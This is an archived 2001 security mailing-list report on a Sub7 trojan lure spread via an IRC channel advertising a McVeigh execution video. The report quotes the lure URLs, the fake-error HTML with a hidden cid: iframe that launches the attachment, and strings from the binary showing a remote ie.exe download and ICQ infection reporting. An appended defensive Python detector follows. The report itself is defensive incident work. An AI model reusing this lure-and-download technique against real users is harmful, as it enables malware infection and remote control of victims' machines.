Security Incidents mailing list archives

[Bradley Chapman <eaglebtc () byu edu>] Timothy McVeigh "video" link lures IRC users to install sub7


From: Adam Stanley <adam () nethosters com>
Date: 12 Jun 2001 11:46:20 -0500

Group,
  Here is the email I received this morning regarding the Sub7 outbreak
on IRC.

-Adam

--
Adam Stanley
CTO / VP
Nethosters, Inc.

-----Forwarded Message-----
From: Bradley Chapman <eaglebtc () byu edu>
To: irc () irc stanford edu
Subject: Timothy McVeigh "video" link lures IRC users to install sub7


To whom it may concern:

My name is Bradley Chapman, and I am a student at Brigham Young University.
Today on the EFNet IRC network, I found a channel called #mcveigh.  I
suspected that this channel was not set up for the best of intentions.
Curious, I joined the room to see what was going on.  Almost immediately, I
was assaulted with an "on-join" advertisement in the form of a channel
notice.  The message asked me to visit the following link to view an .AVI
movie of Tim McVeigh's execution:

http://www.concentric.net/~1horizon/veigh.html

The page itself is blank.  After about 2 seconds, it forwards to an email
link at:

http://www.concentric.net/~1horizon/unknown.eml

This email link opens up a .tmp file, which does nothing.  The webpage now
shows a "Connection Timed Out" message in the same web page.  I was
suspicious when the email hyperlink tried to send me a .TMP file.  After
examining that web page's HTML code, I determined it was a fake error
designed to make people think that the video feed was too busy. (HTML code
shown here):

====================
<HTML>
<HEAD>
</HEAD>
<body bgcolor=lack" link=C0C0C0" vlink=808080" alink=FFFFFF" text=8080FF"
topmargin="><a name=op">
<BODY bgColor=#ffffff>
<iframe src=cid:THE-CID height=0 width=0></iframe>
Connection timed out.(Busy server) Please try again later.<BR> // [note:
fake message]
</BODY>
</HTML>
========================

After using a download manager to save the email file directly, I opened it
with Outlook Express.   I am fully aware of the risks of opening strange
emails, but I know better than to actually run the included attachments.
There were two files inside - "ATT00013.txt" and "update.exe" .  I have
thrown away the .txt file, since it was 0 bytes long.  I have packed
update.exe as a ZIP file and attached it to this email.

Since this was obviously an email virus, I wanted to examine it with a hex
editor for useful info.  Toward the end of the file, I found the following
very interesting pieces of information:

==================================
              %s\%s ie.exe           home.earthlink.net             /~goldi
anstone/ie.exe       GET %s HTTP/1.0  Host: %s     119657247    GET /script
s/WWPMsg.dll?from=psychward&fromemail=wwwpw&subject=file+downloaded&body=%s
+downloaded+and+executed&to=%s     wwp.icq.com
==================================

As you can see, this program attempts a connection with home.earthlink.net,
and accesses the URL "/~goldianstone/ie.exe" .  I presume this file would be
downloaded and executed on the victim's computer.  Also interesting to note
is the ICQ # there: 119657247, accompanied by the WWPMsg.dll script
reference (which passes the sub7 info to the ICQ #).  I contacted the ICQ#,
thinking he/she was the owner of the sub7 bots.  I did make contact, but the
conversation I had was not what I expected: (see attached file
"treesnods.txt")

===================================
SUMMARY: She (according to her ICQ Info) is getting flooded with ICQ notices
from unknown addresses regarding sub7 information.  I tried to get her to
save the log from these notices, but she admitted she was not very
computer-savvy.  I tried many different ways of somehow retrieving the
information, (netmeeting for supervision, winzip to compress the 2000b
folder) but to no avail.  I finally gave up and told her that her ICQ
log--in which she mentions a large number of sub7 messages--would be
sufficient for the email to the ISPs of the offending #mcveigh channel
operators.
===================================

I then re-entered #mcveigh and proceeded to tell the whole channel what the
link was really about.  Not more than 15 seconds later, one of the channel
operators kick-banned me with the following message:

[23:17:23] *** You were kicked from #mcveigh by low (dont be an idiot, thats
what the fbi wants you to think)

I didn't care; I had all the info I needed anyway.  I backscrolled through
the status screen and copied the list of #mcveigh users, then did a /whois
on the channel operators.  Based on their hostmask, I now knew which ISPs
I'd send a "nice letter."

The third attached file (mcveigh.txt) is the user list and /whois results of
just the channel operators.  As you'll see, several of them were in these
rooms together: #astral_projection, #only.hard.nigs.pimp.and.roll.here,
#minnesota, and #aol .

I hope this information is helpful in stopping a potential situation, and in
possibly disciplining those responsible for it.  If treesnods's estimate is
accurate--that is, if there are 60-70 sub7-controlled computers just 18
hours after the execution, and that growth rate continues in the aftermath
of McVeigh's death--then some websites may be in trouble and should be
putting up their shields.

I appreciate your time and effort spent on resolving this issue.  I
apologize for the length of this email, but I felt that all this info was
necessary to prove a point.  I look forward to hearing from each service
provider.

Regards,

 - Brad Chapman
Brigham Young University
801-371-4007
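As an added example (not part of Bradley's message or the archive), a small defender-side check for the lure mechanics he describes: parse an .eml, find zero-size iframes whose src is a cid: reference, and resolve each one to the MIME attachment it points at, flagging executable names. The SAMPLE_EML below is constructed to mirror the HTML quoted above; it is not the original unknown.eml, and the attachment bytes are a placeholder.

```python
import email
import re
from email import policy

# Constructed sample modelled on the page's description: an HTML part with a
# hidden cid: iframe plus an executable attachment. NOT the original unknown.eml;
# the base64 body is a placeholder, not a real binary.
SAMPLE_EML = b"""From: nobody@example.invalid
To: victim@example.invalid
Subject: video
MIME-Version: 1.0
Content-Type: multipart/related; boundary="B1"

--B1
Content-Type: text/html

<HTML><BODY bgColor=#ffffff>
<iframe src=cid:THE-CID height=0 width=0></iframe>
Connection timed out.(Busy server) Please try again later.<BR>
</BODY></HTML>
--B1
Content-Type: application/octet-stream; name="update.exe"
Content-ID: <THE-CID>
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="update.exe"

TVqQAAMAAAAEAAAA
--B1--
"""

# Matches an <iframe ...> tag whose src is a Content-ID reference (quotes optional).
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*\bsrc\s*=\s*[\"']?cid:([^\s\"'>]+)[^>]*>", re.IGNORECASE)
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs")

def find_hidden_cid_iframes(raw: bytes) -> list[dict]:
    """Return one finding per cid: iframe in any text/html part: the CID, whether
    the frame is zero-sized, the attachment filename it resolves to, and whether
    that filename has an executable extension."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    # Map Content-ID (angle brackets stripped) -> attachment filename
    cids = {}
    for part in msg.walk():
        cid = part.get("Content-ID")
        if cid:
            cids[cid.strip("<>")] = part.get_filename() or ""
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for m in HIDDEN_IFRAME.finditer(part.get_content()):
            tag, cid = m.group(0), m.group(1)
            zero = re.search(r"\b(height|width)\s*=\s*[\"']?0\b", tag, re.I) is not None
            name = cids.get(cid, "")
            findings.append({"cid": cid, "hidden": zero, "attachment": name,
                             "executable": name.lower().endswith(EXEC_EXT)})
    return findings
```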